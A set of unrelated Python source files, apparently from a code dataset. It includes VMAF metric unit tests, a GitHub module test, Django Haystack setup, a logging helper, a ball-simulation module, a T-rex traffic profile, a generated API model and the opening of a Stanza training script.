self.assertAlmostEqual(results[0]['float_VIF_feature_vif_scale2_egl_1_score'], 0.9984692380091739, places=4)
self.assertAlmostEqual(results[0]['float_VIF_feature_vif_scale3_egl_1_score'], 0.999146211879154, places=4)
def test_run_float_vif_fextractor_akiyo_multiply_enhn_gain_limit_1d1(self):
ref_path = VmafConfig.test_resource_path("yuv", "refp_vmaf_hacking_investigation_0_0_akiyo_cif_notyuv_0to0_identity_vs_akiyo_cif_notyuv_0to0_multiply_q_352x288")
dis_path = VmafConfig.test_resource_path("yuv", "disp_vmaf_hacking_investigation_0_0_akiyo_cif_notyuv_0to0_identity_vs_akiyo_cif_notyuv_0to0_multiply_q_352x288")
asset = Asset(dataset="test", content_id=0, asset_id=0,
workdir_root=VmafConfig.workdir_path(),
ref_path=ref_path,
dis_path=dis_path,
asset_dict={'width': 352, 'height': 288})
self.fextractor = FloatVifFeatureExtractor(
[asset],
None, fifo_mode=False,
result_store=None,
optional_dict={'vif_enhn_gain_limit': 1.1},
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
self.assertAlmostEqual(results[0]['float_VIF_feature_vif_scale0_egl_1.1_score'], 1.0298451531242514, places=3)
self.assertAlmostEqual(results[0]['float_VIF_feature_vif_scale1_egl_1.1_score'], 1.046596975760772, places=3)
self.assertAlmostEqual(results[0]['float_VIF_feature_vif_scale2_egl_1.1_score'], 1.0485607628500504, places=3)
self.assertAlmostEqual(results[0]['float_VIF_feature_vif_scale3_egl_1.1_score'], 1.0491232394147363, places=3)
def test_run_integer_vif_fextractor_akiyo_multiply(self):
ref_path = VmafConfig.test_resource_path("yuv", "refp_vmaf_hacking_investigation_0_0_akiyo_cif_notyuv_0to0_identity_vs_akiyo_cif_notyuv_0to0_multiply_q_352x288")
dis_path = VmafConfig.test_resource_path("yuv", "disp_vmaf_hacking_investigation_0_0_akiyo_cif_notyuv_0to0_identity_vs_akiyo_cif_notyuv_0to0_multiply_q_352x288")
asset = Asset(dataset="test", content_id=0, asset_id=0,
workdir_root=VmafConfig.workdir_path(),
ref_path=ref_path,
dis_path=dis_path,
asset_dict={'width': 352, 'height': 288})
self.fextractor = IntegerVifFeatureExtractor(
[asset],
None, fifo_mode=False,
result_store=None
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_scale0_score'], 1.052403, places=5)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_scale1_score'], 1.070149, places=5)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_scale2_score'], 1.072518, places=5)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_scale3_score'], 1.072512, places=5)
except AssertionError as e: self.verificationErrors.append(str(e))
def test_run_integer_vif_fextractor_akiyo_multiply_enhn_gain_limit_1(self):
ref_path = VmafConfig.test_resource_path("yuv", "refp_vmaf_hacking_investigation_0_0_akiyo_cif_notyuv_0to0_identity_vs_akiyo_cif_notyuv_0to0_multiply_q_352x288")
dis_path = VmafConfig.test_resource_path("yuv", "disp_vmaf_hacking_investigation_0_0_akiyo_cif_notyuv_0to0_identity_vs_akiyo_cif_notyuv_0to0_multiply_q_352x288")
asset = Asset(dataset="test", content_id=0, asset_id=0,
workdir_root=VmafConfig.workdir_path(),
ref_path=ref_path,
dis_path=dis_path,
asset_dict={'width': 352, 'height': 288})
self.fextractor = IntegerVifFeatureExtractor(
[asset],
None, fifo_mode=False,
result_store=None,
optional_dict={'vif_enhn_gain_limit': 1.0},
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_scale0_egl_1_score'], 0.983699512450884, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_scale1_egl_1_score'], 0.9974276726830457, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_scale2_egl_1_score'], 0.9984692380091739, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_scale3_egl_1_score'], 0.999146211879154, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
def test_run_integer_vif_fextractor_akiyo_multiply_enhn_gain_limit_1d1(self):
ref_path = VmafConfig.test_resource_path("yuv", "refp_vmaf_hacking_investigation_0_0_akiyo_cif_notyuv_0to0_identity_vs_akiyo_cif_notyuv_0to0_multiply_q_352x288")
dis_path = VmafConfig.test_resource_path("yuv", "disp_vmaf_hacking_investigation_0_0_akiyo_cif_notyuv_0to0_identity_vs_akiyo_cif_notyuv_0to0_multiply_q_352x288")
asset = Asset(dataset="test", content_id=0, asset_id=0,
workdir_root=VmafConfig.workdir_path(),
ref_path=ref_path,
dis_path=dis_path,
asset_dict={'width': 352, 'height': 288})
self.fextractor = IntegerVifFeatureExtractor(
[asset],
None, fifo_mode=False,
result_store=None,
optional_dict={'vif_enhn_gain_limit': 1.1},
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_scale0_egl_1.1_score'], 1.0298451531242514, places=3)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_scale1_egl_1.1_score'], 1.046596975760772, places=3)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_scale2_egl_1.1_score'], 1.0485607628500504, places=3)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_scale3_egl_1.1_score'], 1.0491232394147363, places=3)
except AssertionError as e: self.verificationErrors.append(str(e))
def test_run_integer_adm_fextractor(self):
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.fextractor = IntegerAdmFeatureExtractor(
[asset, asset_original],
None, fifo_mode=False,
result_store=None
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
self.assertAlmostEqual(results[0]['integer_ADM_feature_adm2_score'], 0.9345057916666667, places=4)
self.assertAlmostEqual(results[1]['integer_ADM_feature_adm2_score'], 1.000002, places=6)
try: self.assertAlmostEqual(results[0]['integer_ADM_feature_adm_scale0_score'], 0.9078873333333334, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_ADM_feature_adm_scale1_score'], 0.8938705625000001, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_ADM_feature_adm_scale2_score'], 0.9300123749999999, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_ADM_feature_adm_scale3_score'], 0.9649663541666667, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
with self.assertRaises(KeyError):
s = results[0]['integer_adm_num_score']
def test_run_integer_adm_fextractor_with_debug(self):
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.fextractor = IntegerAdmFeatureExtractor(
[asset, asset_original],
None, fifo_mode=False,
result_store=None,
optional_dict={'debug': True},
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
self.assertAlmostEqual(results[0]['integer_ADM_feature_adm2_score'], 0.9345057916666667, places=4)
self.assertAlmostEqual(results[1]['integer_ADM_feature_adm2_score'], 1.000002, places=6)
try: self.assertAlmostEqual(results[0]['integer_ADM_feature_adm_scale0_score'], 0.9078873333333334, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_ADM_feature_adm_scale1_score'], 0.8938705625000001, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_ADM_feature_adm_scale2_score'], 0.9300123749999999, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_ADM_feature_adm_scale3_score'], 0.9649663541666667, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_ADM_feature_adm_num_score'], 371.8243668541666, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_ADM_feature_adm_den_score'], 397.8567857291667, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_ADM_feature_adm_num_scale0_score'], 45.526718708333334, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_ADM_feature_adm_den_scale0_score'], 50.14397566666668, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_ADM_feature_adm_num_scale1_score'], 66.57503025, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_ADM_feature_adm_den_scale1_score'], 74.47584229166667, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_ADM_feature_adm_num_scale2_score'], 105.5588711875, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_ADM_feature_adm_den_scale2_score'], 113.50324393750002, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_ADM_feature_adm_num_scale3_score'], 154.1637464375, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_ADM_feature_adm_den_scale3_score'], 159.733723875, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
def test_run_integer_adm_fextractor_12bit(self):
ref_path, dis_path, asset, asset_original = set_default_576_324_12bit_videos_for_testing()
self.fextractor = IntegerAdmFeatureExtractor(
[asset, asset_original],
None, fifo_mode=False,
result_store=None
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
self.assertAlmostEqual(results[0]['integer_ADM_feature_adm2_score'], 0.9517706666666667, places=4)
self.assertAlmostEqual(results[1]['integer_ADM_feature_adm2_score'], 1.000002, places=6)
def test_run_integer_adm_fextractor_akiyo_multiply(self):
ref_path = VmafConfig.test_resource_path("yuv", "refp_vmaf_hacking_investigation_0_0_akiyo_cif_notyuv_0to0_identity_vs_akiyo_cif_notyuv_0to0_multiply_q_352x288")
dis_path = VmafConfig.test_resource_path("yuv", "disp_vmaf_hacking_investigation_0_0_akiyo_cif_notyuv_0to0_identity_vs_akiyo_cif_notyuv_0to0_multiply_q_352x288")
asset = Asset(dataset="test", content_id=0, asset_id=0,
workdir_root=VmafConfig.workdir_path(),
ref_path=ref_path,
dis_path=dis_path,
asset_dict={'width': 352, 'height': 288})
self.fextractor = IntegerAdmFeatureExtractor(
[asset],
None, fifo_mode=False,
result_store=None
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
try: self.assertAlmostEqual(results[0]['integer_ADM_feature_adm2_score'], 1.1167, places=5) # float 1.116686
except AssertionError as e: self.verificationErrors.append(str(e))
def test_run_integer_adm_fextractor_akiyo_multiply_enhn_gain_limit_1(self):
ref_path = VmafConfig.test_resource_path("yuv", "refp_vmaf_hacking_investigation_0_0_akiyo_cif_notyuv_0to0_identity_vs_akiyo_cif_notyuv_0to0_multiply_q_352x288")
dis_path = VmafConfig.test_resource_path("yuv", "disp_vmaf_hacking_investigation_0_0_akiyo_cif_notyuv_0to0_identity_vs_akiyo_cif_notyuv_0to0_multiply_q_352x288")
asset = Asset(dataset="test", content_id=0, asset_id=0,
workdir_root=VmafConfig.workdir_path(),
ref_path=ref_path,
dis_path=dis_path,
asset_dict={'width': 352, 'height': 288})
self.fextractor = IntegerAdmFeatureExtractor(
[asset],
None, fifo_mode=False,
result_store=None,
optional_dict={'adm_enhn_gain_limit': 1.0}
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
self.assertAlmostEqual(results[0]['integer_ADM_feature_adm2_egl_1_score'], 0.957433, places=6) # float 0.9574308606115118
def test_run_integer_adm_fextractor_akiyo_multiply_enhn_gain_limit_1d2(self):
ref_path = VmafConfig.test_resource_path("yuv", "refp_vmaf_hacking_investigation_0_0_akiyo_cif_notyuv_0to0_identity_vs_akiyo_cif_notyuv_0to0_multiply_q_352x288")
dis_path = VmafConfig.test_resource_path("yuv", "disp_vmaf_hacking_investigation_0_0_akiyo_cif_notyuv_0to0_identity_vs_akiyo_cif_notyuv_0to0_multiply_q_352x288")
asset = Asset(dataset="test", content_id=0, asset_id=0,
workdir_root=VmafConfig.workdir_path(),
ref_path=ref_path,
dis_path=dis_path,
asset_dict={'width': 352, 'height': 288})
self.fextractor = IntegerAdmFeatureExtractor(
[asset],
None, fifo_mode=False,
result_store=None,
optional_dict={'adm_enhn_gain_limit': 1.2}
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
try: self.assertAlmostEqual(results[0]['integer_ADM_feature_adm2_egl_1.2_score'], 1.116609, places=5) # float 1.116595
except AssertionError as e: self.verificationErrors.append(str(e))
def test_run_ciede2000_fextractor(self):
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.fextractor = CIEDE2000FeatureExtractor(
[asset, asset_original],
None, fifo_mode=False,
result_store=None
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
try: self.assertAlmostEqual(results[0]['CIEDE2000_feature_ciede2000_score'], 33.10755745833333, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
        try: self.assertAlmostEqual(results[1]['CIEDE2000_feature_ciede2000_score'], float('inf'), places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
if __name__ == '__main__':
unittest.main(verbosity=2)
|
py | b414ba5869915604b65b899457bb0a18057457c5 | # Copyright Contributors to the Testing Farm project.
# SPDX-License-Identifier: Apache-2.0
import os
import pytest
import re
import gluetool
import gluetool_modules_framework.infrastructure.github
from . import create_module
ASSETS_DIR = os.path.join('gluetool_modules_framework', 'tests', 'assets', 'github')
# NOTE(ivasilev) commits and commit_statuses are heavily mocked just to make depends-on tests pass
GET_COMMIT = {
"commit": {
"url": "https://api.github.com/repos/octocat/Hello-World/git/commits/6dcb09b5b57875f334f61aebed695e2e4193db5e",
"author": {
"name": "Monalisa Octocat",
"email": "[email protected]",
"date": "2011-04-14T16:00:49Z"},
"message": "Some commit message"
},
"state": "mocked-to-make-tests-pass",
"statuses": []
}
def _load_assets(name):
return gluetool.utils.load_json(os.path.join(ASSETS_DIR, '{}.json'.format(name)))
@pytest.fixture
def module():
github_module = create_module(gluetool_modules_framework.infrastructure.github.GitHub)[1]
github_module._config['pull-request'] = 'oamg:leapp-repository:620:7fb300d703abbd07e8834d121bd2ac3088535c8b'
return github_module
def test_depends_on(module, monkeypatch):
# Borrowed from copr test
class dummy_request(object):
def __init__(self, source):
self.source = source
self.content = str(self.source)
self.status_code = 200
self.links = {}
def json(self):
return self.source
def mocked_get(url, params=None):
if re.match(r'.*/pulls/\d+$', url):
return dummy_request(_load_assets("fetch_pull_request"))
elif re.match(r'.*/repos/oamg/leapp-repository/commits/.*', url):
return dummy_request(GET_COMMIT)
elif re.match(r'.*/repos/oamg/leapp-repository/pulls/\d+/commits', url):
return dummy_request(_load_assets("list_pr_commits"))
monkeypatch.setattr(gluetool_modules_framework.infrastructure.github.requests, 'get', mocked_get)
monkeypatch.setattr(gluetool_modules_framework.infrastructure.github, 'is_json_response', lambda _: True)
monkeypatch.setattr(
gluetool_modules_framework.infrastructure.github.GitHubAPI, 'is_collaborator', lambda a, b, c, d: False
)
assert module.eval_context == {}
module.execute()
eval_context = module.eval_context
primary_task = module.primary_task()
assert eval_context['PRIMARY_TASK'] == primary_task
assert primary_task.depends_on == ['leapp-repository/PR42', 'anotherproject/PR4242', 'leapp/PR669']
# TODO technical debt - cover other test cases.
|
py | b414ba7b6cafacc828661711c7d29722bacb4f2e | import logging
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from haystack.constants import DEFAULT_ALIAS
from haystack import signals
from haystack.utils import loading
__author__ = 'Daniel Lindsley'
__version__ = (2, 0, 0, 'beta')
# Setup default logging.
log = logging.getLogger('haystack')
stream = logging.StreamHandler()
stream.setLevel(logging.INFO)
log.addHandler(stream)
# Help people clean up from 1.X.
if hasattr(settings, 'HAYSTACK_SITECONF'):
raise ImproperlyConfigured('The HAYSTACK_SITECONF setting is no longer used & can be removed.')
if hasattr(settings, 'HAYSTACK_SEARCH_ENGINE'):
raise ImproperlyConfigured('The HAYSTACK_SEARCH_ENGINE setting has been replaced with HAYSTACK_CONNECTIONS.')
if hasattr(settings, 'HAYSTACK_ENABLE_REGISTRATIONS'):
raise ImproperlyConfigured('The HAYSTACK_ENABLE_REGISTRATIONS setting is no longer used & can be removed.')
if hasattr(settings, 'HAYSTACK_INCLUDE_SPELLING'):
raise ImproperlyConfigured('The HAYSTACK_INCLUDE_SPELLING setting is now a per-backend setting & belongs in HAYSTACK_CONNECTIONS.')
# Check the 2.X+ bits.
if not hasattr(settings, 'HAYSTACK_CONNECTIONS'):
raise ImproperlyConfigured('The HAYSTACK_CONNECTIONS setting is required.')
if DEFAULT_ALIAS not in settings.HAYSTACK_CONNECTIONS:
raise ImproperlyConfigured("The default alias '%s' must be included in the HAYSTACK_CONNECTIONS setting." % DEFAULT_ALIAS)
# Load the connections.
connections = loading.ConnectionHandler(settings.HAYSTACK_CONNECTIONS)
# Load the router(s).
connection_router = loading.ConnectionRouter()
if hasattr(settings, 'HAYSTACK_ROUTERS'):
if not isinstance(settings.HAYSTACK_ROUTERS, (list, tuple)):
raise ImproperlyConfigured("The HAYSTACK_ROUTERS setting must be either a list or tuple.")
connection_router = loading.ConnectionRouter(settings.HAYSTACK_ROUTERS)
# Setup the signal processor.
signal_processor_path = getattr(settings, 'HAYSTACK_SIGNAL_PROCESSOR', 'haystack.signals.BaseSignalProcessor')
signal_processor_class = loading.import_class(signal_processor_path)
signal_processor = signal_processor_class(connections, connection_router)
# Per-request, reset the ghetto query log.
# Probably not extraordinarily thread-safe but should only matter when
# DEBUG = True.
def reset_search_queries(**kwargs):
for conn in connections.all():
conn.reset_queries()
if settings.DEBUG:
from django.core import signals as django_signals
django_signals.request_started.connect(reset_search_queries)
|
py | b414bb6db1effc3a0e77033625fbdb7483a39ab1 | import logging
import sys
from logging.handlers import TimedRotatingFileHandler
class InfoFilter(logging.Filter):
def filter(self, rec):
return rec.levelno in (logging.DEBUG, logging.INFO)
class ErrorFilter(logging.Filter):
def filter(self, rec):
return rec.levelno in (logging.WARNING, logging.ERROR, logging.CRITICAL)
def create_logger(logging_path, logger_name):
logger = logging.getLogger(logger_name)
logger.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
h1 = logging.StreamHandler(sys.stdout)
h1.setLevel(logging.DEBUG)
h1.addFilter(InfoFilter())
h1.setFormatter(formatter)
logger.addHandler(h1)
h2 = logging.StreamHandler(sys.stderr)
h2.setLevel(logging.WARNING)
h2.addFilter(ErrorFilter())
h2.setFormatter(formatter)
logger.addHandler(h2)
h3 = TimedRotatingFileHandler(logging_path, when="midnight", interval=1)
h3.setLevel(logging.DEBUG)
h3.setFormatter(formatter)
logger.addHandler(h3)
return logger
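# Minimal usage sketch (illustrative only; assumes "example.log" is a writable path
# in the working directory): DEBUG/INFO records go to stdout, WARNING and above go
# to stderr, and all records are appended to the midnight-rotating log file.
if __name__ == '__main__':
    demo_logger = create_logger('example.log', 'demo')
    demo_logger.info('goes to stdout and the rotating file')
    demo_logger.warning('goes to stderr and the rotating file')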
|
py | b414bd0948f5c8573e1a39ddcba482c382a4de92 | import os, time, datetime, threading, random, sys
import numpy as np
from cortix.src.module import Module
from cortix.src.port import Port
from cortix.src.cortix_main import Cortix
from plot_multi import Plot
from bouncingball import BouncingBall
import shapely.geometry as geo
class BallHandler(Module):
def __init__(self,shape=None, balls= 5, runtime=3):
super().__init__()
self.shape = shape
self.balls = balls
self.runtime = runtime
self.local_balls = []
self.local_messengers = []
self.timestamp=str(datetime.datetime.now())
for i in range(self.balls):
ball = BouncingBall(self.shape)
ball.r = 0.1
self.local_balls.append(ball)
self.local_messengers.append(ball.messenger)
def run(self):
t = 0.01
self.elapsed, oe = 0,0
its = round(self.runtime/t)
ball_list = []
for messenger in self.local_messengers:
ball_list.append(messenger)
for i in self.ports: #Send initial properties
if 'plot' not in str(i):
self.send(self.local_messengers,i)
for i in self.ports:
if 'plot' not in str(i):
ex_balls = self.recv(i)
for ball in ex_balls:
ball_list.append(ball)
for i in range(its):
self.elapsed += t
if oe != round(self.elapsed,1):
print('Time Elapsed: ', round(self.elapsed,1))
oe = round(self.elapsed,1)
for ball in self.local_balls:
ball.run(ball_list)
for i in self.ports: #Send and receive messages for each timestep
self.send(self.local_messengers,i)
ball_list = [f for f in self.local_messengers]
for i in self.ports:
if 'plot' in str(i): #Not receiving messages from plotting
continue
messengerlis = self.recv(i)
for messenger in messengerlis:
ball_list.append(messenger)
for ball in self.local_balls:
ball.messenger.collision = []
for i in self.ports: #Send 'done' string to plot module as end condition
if 'plot' in str(i):
self.send('done',i)
print('Time Elapsed: ', self.elapsed)
print('Done')
if __name__ == '__main__':
cortix = Cortix(use_mpi=False)
mod_list = []
shape = geo.box(-30,0,30,50)
plot = Plot(shape=shape, modules=10)
plot.fps = 10
cortix.add_module(plot)
for i in range(10):
time.sleep(0.01)
app = BallHandler(shape, balls=10,runtime = 1)
mod_list.append(app)
cortix.add_module(app)
for c,i in enumerate(mod_list):
i.connect('plot-send{}'.format(c),plot.get_port('plot-receive{}'.format(c)))
for j in mod_list:
if i == j:
continue
name = '{}{}'.format(i.timestamp,j.timestamp)
name2 = '{}{}'.format(j.timestamp,i.timestamp)
j.connect(name, i.get_port(name2))
cortix.draw_network('network_graph.png')
cortix.run()
print('bye')
|
py | b414bd1c7a984bce5e4b36333da6399dd1887433 | # Copyright (c) 2020 Cisco and/or its affiliates.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Stream profile for T-rex traffic generator.
Stream profile:
- Two streams sent in directions 0 --> 1 and 1 --> 0 at the same time.
- Packet: ETH / DOT1Q / IP /
- Direction 0 --> 1:
- VLAN range: 1 - 100
- Source IP address range: 10.0.0.1 - 10.0.0.254
- Destination IP address range: 20.0.0.1 - 20.0.0.254
- Direction 1 --> 0:
- VLAN range: 1 - 100
- Source IP address range: 20.0.0.1 - 20.0.0.254
- Destination IP address range: 10.0.0.1 - 10.0.0.254
"""
from trex.stl.api import *
from profile_trex_stateless_base_class import TrafficStreamsBaseClass
class TrafficStreams(TrafficStreamsBaseClass):
"""Stream profile."""
def __init__(self):
"""Initialization and setting of streams' parameters."""
super(TrafficStreamsBaseClass, self).__init__()
# VLAN IDs
self.vlans = 100
self.p1_vlan_start = 1
self.p1_vlan_end = self.p1_vlan_start + self.vlans - 1
self.p2_vlan_start = 1
self.p2_vlan_end = self.p2_vlan_start + self.vlans - 1
# IPs used in packet headers.
self.p1_src_start_ip = u"10.0.0.1"
self.p1_src_end_ip = u"10.0.0.254"
self.p1_dst_start_ip = u"20.0.0.1"
self.p1_dst_end_ip = u"20.0.0.254"
self.p2_src_start_ip = u"20.0.0.1"
self.p2_src_end_ip = u"20.0.0.254"
self.p2_dst_start_ip = u"10.0.0.1"
self.p2_dst_end_ip = u"10.0.0.254"
def define_packets(self):
"""Defines the packets to be sent from the traffic generator.
Packet definition: | ETH | DOT1Q | IP |
:returns: Packets to be sent from the traffic generator.
:rtype: tuple
"""
# Direction 0 --> 1
base_pkt_a = (
Ether() /
Dot1Q(
vlan=self.p1_vlan_start
) /
IP(
src=self.p1_src_start_ip,
dst=self.p1_dst_start_ip,
proto=61
)
)
# Direction 1 --> 0
base_pkt_b = (
Ether() /
Dot1Q(
vlan=self.p2_vlan_start
) /
IP(
src=self.p2_src_start_ip,
dst=self.p2_dst_start_ip,
proto=61
)
)
# Direction 0 --> 1
vm1 = STLScVmRaw(
[
STLVmFlowVar(
name=u"vlan",
min_value=self.p1_vlan_start,
max_value=self.p1_vlan_end,
size=2,
op=u"inc"
),
STLVmWrFlowVar(
fv_name=u"vlan",
pkt_offset=u"Dot1Q.vlan"
),
STLVmFlowVar(
name=u"ip_src",
min_value=self.p1_src_start_ip,
max_value=self.p1_src_end_ip,
size=4,
op=u"random"
),
STLVmWrFlowVar(
fv_name=u"ip_src",
pkt_offset=u"IP.src"
),
STLVmFlowVar(
name=u"ip_dst",
min_value=self.p1_dst_start_ip,
max_value=self.p1_dst_end_ip,
size=4,
op=u"random"
),
STLVmWrFlowVar(
fv_name=u"ip_dst",
pkt_offset=u"IP.dst"
),
STLVmFixIpv4(
offset=u"IP"
)
]
)
# Direction 1 --> 0
vm2 = STLScVmRaw(
[
STLVmFlowVar(
name=u"vlan",
min_value=self.p2_vlan_start,
max_value=self.p2_vlan_end,
size=2,
op=u"inc"
),
STLVmWrFlowVar(
fv_name=u"vlan",
pkt_offset=u"Dot1Q.vlan"
),
STLVmFlowVar(
name=u"ip_src",
min_value=self.p2_src_start_ip,
max_value=self.p2_src_end_ip,
size=4,
op=u"random"
),
STLVmWrFlowVar(
fv_name=u"ip_src",
pkt_offset=u"IP.src"
),
STLVmFlowVar(
name=u"ip_dst",
min_value=self.p2_dst_start_ip,
max_value=self.p2_dst_end_ip,
size=4,
op=u"random"
),
STLVmWrFlowVar(
fv_name=u"ip_dst",
pkt_offset=u"IP.dst"
),
STLVmFixIpv4(
offset=u"IP"
)
]
)
return base_pkt_a, base_pkt_b, vm1, vm2
def register():
"""Register this traffic profile to T-rex.
Do not change this function.
:returns: Traffic streams.
:rtype: Object
"""
return TrafficStreams()
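# Local inspection sketch (illustrative only; the __main__ guard is not how T-rex
# itself loads the profile): building the profile object directly exposes the two
# base packets and field-engine programs defined above.
if __name__ == "__main__":
    streams = register()
    base_pkt_a, base_pkt_b, vm1, vm2 = streams.define_packets()
    print(repr(base_pkt_a))  # ETH / DOT1Q(vlan=1) / IP 10.0.0.1 -> 20.0.0.1
    print(repr(base_pkt_b))  # ETH / DOT1Q(vlan=1) / IP 20.0.0.1 -> 10.0.0.1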
|
py | b414bd34c155ba5b75b6e6a5a423e28ea6dff3b2 | # coding: utf-8
from __future__ import absolute_import
from datetime import date, datetime # noqa: F401
from typing import List, Dict # noqa: F401
from tapi_server.models.base_model_ import Model
from tapi_server.models.tapi_oam_getoamjob_input import TapiOamGetoamjobInput # noqa: F401,E501
from tapi_server import util
class InlineObject21(Model):
"""NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech).
Do not edit the class manually.
"""
def __init__(self, input=None): # noqa: E501
"""InlineObject21 - a model defined in OpenAPI
:param input: The input of this InlineObject21. # noqa: E501
:type input: TapiOamGetoamjobInput
"""
self.openapi_types = {
'input': TapiOamGetoamjobInput
}
self.attribute_map = {
'input': 'input'
}
self._input = input
@classmethod
def from_dict(cls, dikt) -> 'InlineObject21':
"""Returns the dict as a model
:param dikt: A dict.
:type: dict
:return: The inline_object_21 of this InlineObject21. # noqa: E501
:rtype: InlineObject21
"""
return util.deserialize_model(dikt, cls)
@property
def input(self):
"""Gets the input of this InlineObject21.
:return: The input of this InlineObject21.
:rtype: TapiOamGetoamjobInput
"""
return self._input
@input.setter
def input(self, input):
"""Sets the input of this InlineObject21.
:param input: The input of this InlineObject21.
:type input: TapiOamGetoamjobInput
"""
self._input = input
|
py | b414bf56a828a3d5fbadbb183ee94b7eadb7d38e | import argparse
import logging
import os
import pathlib
import re
import subprocess
import sys
import tempfile
from enum import Enum
from stanza.models.common.constant import treebank_to_short_name
from stanza.utils.datasets import common
import stanza.utils.default_paths as default_paths
from stanza.utils import conll18_ud_eval as ud_eval
logger = logging.getLogger('stanza')
class Mode(Enum):
TRAIN = 1
SCORE_DEV = 2
SCORE_TEST = 3
def build_argparse():
parser = argparse.ArgumentParser()
parser.add_argument('--save_output', dest='temp_output', default=True, action='store_false', help="Save output - default is to use a temp directory.")
parser.add_argument('treebanks', type=str, nargs='+', help='Which treebanks to run on. Use all_ud or ud_all for all UD treebanks')
parser.add_argument('--train', dest='mode', default=Mode.TRAIN, action='store_const', const=Mode.TRAIN, help='Run in train mode')
parser.add_argument('--score_dev', dest='mode', action='store_const', const=Mode.SCORE_DEV, help='Score the dev set')
parser.add_argument('--score_test', dest='mode', action='store_const', const=Mode.SCORE_TEST, help='Score the test set')
# This argument needs to be here so we can identify if the model already exists in the user-specified home
parser.add_argument('--save_dir', type=str, default=None, help="Root dir for saving models. If set, will override the model's default.")
parser.add_argument('--force', dest='force', action='store_true', default=False, help='Retrain existing models')
return parser
SHORTNAME_RE = re.compile("[a-z-]+_[a-z0-9]+")
def main(run_treebank, model_dir, model_name, add_specific_args=None):
logger.info("Training program called with:\n" + " ".join(sys.argv))
paths = default_paths.get_default_paths()
parser = build_argparse()
if add_specific_args is not None:
add_specific_args(parser)
if '--extra_args' in sys.argv:
idx = sys.argv.index('--extra_args')
extra_args = sys.argv[idx+1:]
command_args = parser.parse_args(sys.argv[1:idx])
else:
command_args, extra_args = parser.parse_known_args()
# Pass this through to the underlying model as well as use it here
if command_args.save_dir:
extra_args.extend(["--save_dir", command_args.save_dir])
mode = command_args.mode
treebanks = []
for treebank in command_args.treebanks:
# this is a really annoying typo to make if you copy/paste a
# UD directory name on the cluster and your job dies 30s after
# being queued for an hour
